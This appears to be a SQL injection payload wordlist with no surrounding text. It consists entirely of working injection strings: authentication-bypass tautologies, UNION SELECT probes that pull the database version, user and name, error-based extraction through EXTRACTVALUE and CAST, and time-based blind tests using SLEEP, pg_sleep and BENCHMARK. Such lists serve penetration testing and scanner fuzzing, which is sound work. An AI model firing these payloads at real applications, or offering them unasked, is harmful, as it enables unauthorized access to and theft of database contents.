' OR '1'='1
' OR '1'='1' --
' OR 1=1 --
' OR 'x'='x'
' OR 'abc'='abc'
' OR '1'='1' /*
' OR 'a'='a'
' OR '1'='1' AND '1'='1
' OR '1'='1' AND 1=1 --
' OR 1=1#
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT @@version--
' UNION SELECT user()--
' UNION SELECT database()--
' AND EXTRACTVALUE(1, CONCAT(0x5c,(SELECT @@version)))--
' AND 1=CAST(0x41424344 AS int)--
' OR IF(1=1, SLEEP(5), 0)--
' OR SLEEP(5)--
' OR pg_sleep(5)--
' OR pg_sleep(5);--
' OR '1'='1' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' OR BENCHMARK(1000000,MD5(1))--